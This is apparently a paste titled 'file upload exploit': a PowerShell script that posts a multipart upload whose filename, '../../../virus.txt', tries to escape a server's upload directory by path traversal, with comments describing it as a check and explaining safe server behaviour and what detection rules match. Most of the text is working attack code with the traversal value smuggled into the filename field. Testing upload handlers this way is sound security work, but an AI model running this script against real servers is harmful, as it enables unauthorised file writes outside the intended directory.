
file upload exploit

a guest
Mar 10th, 2020
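  # Upload-filename path traversal check.
  #
  # Sends one multipart/form-data POST whose "file[]" part carries a
  # client-chosen filename containing "../" segments, then prints the reply.
  #
  # What the check is probing: an upload handler that joins the client-supplied
  # filename onto its storage directory without first reducing it to a base name
  # can end up writing outside that directory. A handler that is safe either
  # rejects the request or stores the content under a server-generated name.
  # The HTTP reply alone does not show where the file landed; confirm on the
  # server's filesystem. The "../" filename in the request body / upload logs is
  # the artefact a WAF or detection rule would match on.

  $url = "url/uploads";                       # placeholder from the paste; HttpClient needs an absolute URL here
  $targetFileName = "../../../virus.txt";     # filename sent in the part's Content-Disposition header
  $sourceFilePath = "C:\temp\ipaddrs.txt"     # local file whose bytes become the part body

  $access_token = "Bearer XXXXXXXX"           # placeholder; keep real tokens out of saved copies of the script

  # Windows PowerShell does not load System.Net.Http by default, so the type
  # names below would fail to resolve without this line.
  Add-Type -AssemblyName System.Net.Http

  $httpClient = $null
  $form = $null
  $response = $null

  try {
      $file_bytes = [System.IO.File]::ReadAllBytes($sourceFilePath)

      [System.Net.Http.HttpClient]$httpClient = New-Object System.Net.Http.HttpClient
      [System.Net.Http.MultipartFormDataContent]$form = New-Object System.Net.Http.MultipartFormDataContent

      # TryAddWithoutValidation returns a bool; Out-Null keeps it out of the output.
      $requestHeaders = $httpClient.DefaultRequestHeaders
      $requestHeaders.TryAddWithoutValidation("Accept", "application/json, text/plain, */*") | Out-Null
      $requestHeaders.TryAddWithoutValidation("Authorization", $access_token) | Out-Null
      $requestHeaders.TryAddWithoutValidation("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36") | Out-Null
      $requestHeaders.TryAddWithoutValidation("Accept-Language", "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7") | Out-Null

      [System.Net.Http.ByteArrayContent]$byteContent = New-Object System.Net.Http.ByteArrayContent([byte[]]($file_bytes), 0, $file_bytes.Length)

      # The form takes ownership of the part; disposing the form disposes it too.
      $form.Add($byteContent, "file[]", $targetFileName)

      # The original assigned $response twice in one statement; once is enough.
      # GetAwaiter().GetResult() blocks like .Result but surfaces the underlying
      # exception instead of an AggregateException wrapper.
      [System.Net.Http.HttpResponseMessage]$response = $httpClient.PostAsync($url, $form).GetAwaiter().GetResult()

      # Status line first: a 4xx here is the outcome a hardened endpoint should give.
      "{0} {1}" -f [int]$response.StatusCode, $response.ReasonPhrase

      # The original piped the body to "fl *", which for a string prints only its
      # Length property. Emit the body text itself.
      $sd = $response.Content.ReadAsStringAsync().GetAwaiter().GetResult()
      $sd
  }
  finally {
      # Release sockets and buffers even when the read or the request throws.
      if ($null -ne $response)   { $response.Dispose() }
      if ($null -ne $form)       { $form.Dispose() }
      if ($null -ne $httpClient) { $httpClient.Dispose() }
  }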